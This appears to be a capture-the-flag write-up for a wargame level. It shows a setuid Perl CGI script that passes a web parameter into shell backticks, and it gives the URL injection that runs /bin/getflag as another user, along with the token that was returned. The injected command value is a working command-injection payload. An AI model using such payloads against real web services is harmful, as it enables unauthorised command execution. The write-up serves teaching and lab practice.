List home file
	-> -rwsr-sr-x  1 flag04  level04  152 Mar  5  2016 level04.pl

/*
!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  print `echo $y 2>&1`;
}
x(param("x"));
*/

There is an information in it # localhost:4747
	-> apache is listening with port 4747
	-> apache base folder is /var/www/
	-> same file is present /var/www/level04/level04.pl and owned by flag04


So we try to inject an "executable" string in param x : http://localhost:4747/?x=`/bin/getflag`
	-> getflag is executed by flag04 so
	Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap 

